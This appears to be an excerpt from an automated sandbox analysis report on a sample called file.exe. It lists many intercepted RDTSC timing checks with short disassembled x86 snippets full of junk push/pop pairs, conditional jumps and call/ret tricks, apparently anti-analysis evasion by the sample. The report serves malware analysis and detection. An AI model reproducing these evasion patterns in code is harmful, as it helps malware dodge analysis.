                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C651 second address: 100C657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C657 second address: 100C664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C664 second address: 100C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F8114E11BE6h 0x0000000c popad 0x0000000d jmp 00007F8114E11BF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C687 second address: 100C69B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8114B92476h 0x00000008 jmp 00007F8114B9246Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C7CE second address: 100C81F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F8114E11C26h 0x0000000f push edx 0x00000010 jmp 00007F8114E11BF7h 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8114E11BF5h 0x0000001d jg 00007F8114E11BE6h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C81F second address: 100C823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F831 second address: 100F835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F835 second address: 100F83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F83B second address: 100F846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8114E11BE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F8A0 second address: 100F8CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B92473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov di, ax 0x0000000d push 00000000h 0x0000000f mov ecx, dword ptr [ebp+122D3886h] 0x00000015 push D2F8E753h 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FA1F second address: 100FA6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d adc dh, FFFFFF87h 0x00000010 push 00000000h 0x00000012 mov ecx, 1AA51D87h 0x00000017 jmp 00007F8114E11BF5h 0x0000001c push 9C69FA65h 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007F8114E11BECh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FA6B second address: 100FA70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FA70 second address: 100FB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8114E11BF9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 6396061Bh 0x00000013 jno 00007F8114E11BF3h 0x00000019 mov di, A512h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F8114E11BE8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 push edi 0x0000003a jne 00007F8114E11BE8h 0x00000040 pop esi 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 adc edx, 7EACD800h 0x0000004a pop edx 0x0000004b mov dword ptr [ebp+122D2D38h], ecx 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F8114E11BE8h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000014h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d add di, B150h 0x00000072 push A50AECDAh 0x00000077 je 00007F8114E11BF8h 0x0000007d push eax 0x0000007e push edx 0x0000007f jne 00007F8114E11BE6h 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB1C second address: 100FB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB20 second address: 100FB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 650AECDAh 0x0000000d ja 00007F8114E11BF1h 0x00000013 lea ebx, dword ptr [ebp+12451781h] 0x00000019 xor esi, dword ptr [ebp+122D37EEh] 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FB50 second address: 100FB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FC09 second address: 100FCAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F8114E11BECh 0x0000000f popad 0x00000010 xor dword ptr [esp], 6817821Ah 0x00000017 mov edx, dword ptr [ebp+122D3976h] 0x0000001d push 00000003h 0x0000001f mov ecx, dword ptr [ebp+122D2D3Dh] 0x00000025 push 00000000h 0x00000027 mov esi, 0A1B22AEh 0x0000002c push 00000003h 0x0000002e mov dx, ax 0x00000031 push 462233A5h 0x00000036 jmp 00007F8114E11BF9h 0x0000003b add dword ptr [esp], 79DDCC5Bh 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007F8114E11BE8h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000017h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c mov esi, dword ptr [ebp+122D3962h] 0x00000062 lea ebx, dword ptr [ebp+1245178Ch] 0x00000068 mov dword ptr [ebp+122D1801h], eax 0x0000006e push eax 0x0000006f jnp 00007F8114E11BEEh 0x00000075 push ebx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D8F5 second address: 102D901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8114B92466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102D901 second address: 102D909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DBD4 second address: 102DBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DEAD second address: 102DEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DEB1 second address: 102DEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E2BB second address: 102E2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F8114E11BF4h 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007F8114E11BF2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E2DE second address: 102E2FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8114B92466h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8114B92474h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E864 second address: 102E869 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E869 second address: 102E87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8114B92466h 0x0000000a pop edx 0x0000000b jc 00007F8114B9246Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E87E second address: 102E88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F8114E11BE6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E88D second address: 102E8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114B9246Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F8114B9246Dh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F8114B92472h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F132 second address: 102F15C instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114E11BECh 0x00000008 pushad 0x00000009 jmp 00007F8114E11BEDh 0x0000000e jl 00007F8114E11BE6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F2AE second address: 102F2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F2B4 second address: 102F2CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF1h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F57C second address: 102F59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8114B92466h 0x0000000a jmp 00007F8114B92474h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F59B second address: 102F5A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8114E11BE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5A7 second address: 102F5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5AB second address: 102F5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5AF second address: 102F5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8114B9247Eh 0x0000000e jg 00007F8114B92472h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102F5C5 second address: 102F5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032F9B second address: 1032F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE8BD second address: FFE8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE8C3 second address: FFE8DC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103679B second address: 10367B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8114E11BEAh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007F8114E11BECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10367B5 second address: 10368BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8114B9247Eh 0x0000000a popad 0x0000000b nop 0x0000000c jbe 00007F8114B92475h 0x00000012 jmp 00007F8114B9246Fh 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jmp 00007F8114B92471h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a pushad 0x0000002b jo 00007F8114B9246Bh 0x00000031 mov ecx, 146FD65Eh 0x00000036 pushad 0x00000037 mov di, 1069h 0x0000003b mov di, dx 0x0000003e popad 0x0000003f popad 0x00000040 lea eax, dword ptr [ebp+12478CF5h] 0x00000046 ja 00007F8114B92467h 0x0000004c mov dword ptr [eax+01h], esp 0x0000004f pushad 0x00000050 jmp 00007F8114B92477h 0x00000055 popad 0x00000056 stc 0x00000057 lea eax, dword ptr [ebp+12478D29h] 0x0000005d pushad 0x0000005e sbb bh, 0000002Ah 0x00000061 sub bx, 7400h 0x00000066 popad 0x00000067 mov dword ptr [eax+01h], ebp 0x0000006a je 00007F8114B92479h 0x00000070 jmp 00007F8114B92473h 0x00000075 js 00007F8114B92467h 0x0000007b mov byte ptr [ebp+122D19F5h], 0000004Fh 0x00000082 jmp 00007F8114B9246Fh 0x00000087 call 00007F8114B92469h 0x0000008c push eax 0x0000008d push edx 0x0000008e pushad 0x0000008f jo 00007F8114B92466h 0x00000095 jmp 00007F8114B92474h 0x0000009a popad 0x0000009b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368BD second address: 10368F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8114E11BE8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F8114E11BE8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F8114E11BF3h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368F0 second address: 10368F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368F5 second address: 10368FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10368FA second address: 1036921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F8114B92475h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036921 second address: 103692B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005323 second address: 100533C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8114B92473h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100533C second address: 1005341 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A192 second address: 103A198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A198 second address: 103A19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A19E second address: 103A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A1A7 second address: 103A1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A1AB second address: 103A1CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F8114B92478h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A95B second address: 103A963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AAD6 second address: 103AAE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F8114B92466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC60 second address: 103AC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F8114E11BEEh 0x0000000b jnl 00007F8114E11BE6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jbe 00007F8114E11BE6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC7F second address: 103AC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jmp 00007F8114B9246Ah 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC90 second address: 103AC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8114E11BE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AC9C second address: 103ACAB instructions: 0x00000000 rdtsc 0x00000002 je 00007F8114B92466h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103E88B second address: 103E890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EC36 second address: 103EC40 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103ED62 second address: 103ED6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8114E11BE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EE18 second address: 103EE28 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F1CA second address: 103F22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8114E11BF3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jnp 00007F8114E11BFBh 0x00000015 pop ebx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F8114E11BE8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F22C second address: 103F230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F230 second address: 103F234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F234 second address: 103F23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F23A second address: 103F23F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F763 second address: 103F767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F767 second address: 103F7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8114E11BF2h 0x00000008 jg 00007F8114E11BE6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 jmp 00007F8114E11BF2h 0x00000019 movsx esi, ax 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F8114E11BE8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F7CA second address: 103F7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F7CE second address: 103F7E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8114E11BF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10401A0 second address: 10401A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10401A4 second address: 10401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1040270 second address: 1040276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041DF9 second address: 1041DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10431EC second address: 1043245 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8114B92466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f pop edi 0x00000010 sub edi, 48F02900h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F8114B92468h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D36BCh] 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d ja 00007F8114B92474h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043C57 second address: 1043C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446DA second address: 10446DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446DE second address: 10446E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
